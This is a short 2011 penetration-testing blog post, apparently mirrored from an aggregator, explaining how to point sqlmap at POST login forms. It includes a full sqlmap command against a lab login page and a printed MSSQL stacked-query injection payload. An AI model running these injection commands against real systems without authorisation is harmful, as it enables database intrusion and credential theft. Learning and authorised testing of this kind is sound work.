< Back to JetLib.com

jetlib.sec » carnal0wnage.attackresearch.com » sqlmap with POST requests

« Expand/Collapse

carnal0wnage.attackresearch.com

March 21, 2011
sqlmap with POST requests

Posted: March 21st, 2011, 5:29am PDT by CG

Tags:

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL
--method=METHOD
--data=DATA
-p TESTPARAMETER
--prefix=PREFIX
--postfix=POSTFIX
--dbms=DBMS

*--dbms= if sqlmap is sucking

we'll assume we have a simple post request

user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---

← I forgot my NTP stuff, so here's more... Webapp Security Fengshui in Hong Kong →